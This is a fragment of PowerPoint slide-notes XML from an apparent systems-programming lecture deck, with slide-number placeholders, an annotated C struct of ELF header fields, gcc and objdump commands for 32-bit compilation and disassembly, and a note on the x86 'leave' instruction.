            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192962" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192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49414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1FD688-6B2C-5049-9211-A6DB3E582AA7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053698" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053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94735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148EDD-1C0A-384D-B172-B3B742C536A2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1020930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10209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17886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434BB8-1AA3-BD46-9E1E-719BB9FEA8D5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1056770" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10567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24656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63103E-C536-BD4D-957E-75B82238F79F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1120218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63103E-C536-BD4D-957E-75B82238F79F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="856461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45AC8D-9B62-EB46-9CE8-9B97C36C024C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054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21825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985A03-163E-1E4C-8C68-36E8EC5C6F82}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028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33517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45AC8D-9B62-EB46-9CE8-9B97C36C024C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054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31711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4BE3C8-9F72-6D44-A7A1-0A50BBDE42EF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1051650" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10516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56323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F2EAA3-B90B-3540-B74E-FE7D42A3FF5B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986114"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986115"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4974173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3B87E9A-786A-1E4C-9343-694BBFBBC8F0}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13349065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A83A21-1A9A-594A-986F-08077ACB5965}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680962" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680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521660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BC7212-411B-5942-8FEE-692F89AA7222}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="685058" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="685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301233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C4E7AA-CE59-7241-833E-74CB5FA3AB0C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688130" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688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93275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46D8B9-543B-D548-B07D-5D7D55BDA067}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689154" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689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07201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3CFF37-792C-D04D-97E6-B44DB70C7969}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694274" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694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764918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4E289D-CBF1-6B44-845D-019EC8EB04E8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="695298" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6952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35029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5CB9E-6733-0B47-B84D-F59E3D4DA6AF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="996354"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996355"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a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char magic[4] = ”\177ELF"; // magic number  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char class; // address size, 1 = 32 bit, 2 = 64 bit  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char byteorder; // 1 = little-endian, 2 = big-endian  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char hversion; // header version, always 1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char pad[9]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short filetype; // file type: 1 = relocatable, 2 = executable,  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>                      // 3 = shared object, 4 = core image  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short archtype; // 2 = SPARC, 3 = x86, 4 = 68K, etc.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int fversion; // file version, always 1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int entry; // entry point if executable  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int phdrpos; // file position of program header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int shdrpos; // file position of section header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int flags; // architecture specific flags, usually 0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short hdrsize; // size of this ELF header  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short phdrent; // size of an entry in program header  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short phdrcnt; // number of entries in program header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short shdrent; // size of an entry in section header  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short phdrcnt; // number of entries in section header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short strsec; // section number that contains section name strings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21297379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E0524B-EAAB-A245-8B91-2BDAE27A256D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696322" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696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90466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1A4070E-5EB9-564E-AA70-CD0932C2E1FA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13235989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8D1A39-98F2-8A4C-B616-4A88B9D6E6CA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699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326107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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14225258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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5186617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leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8117858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a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
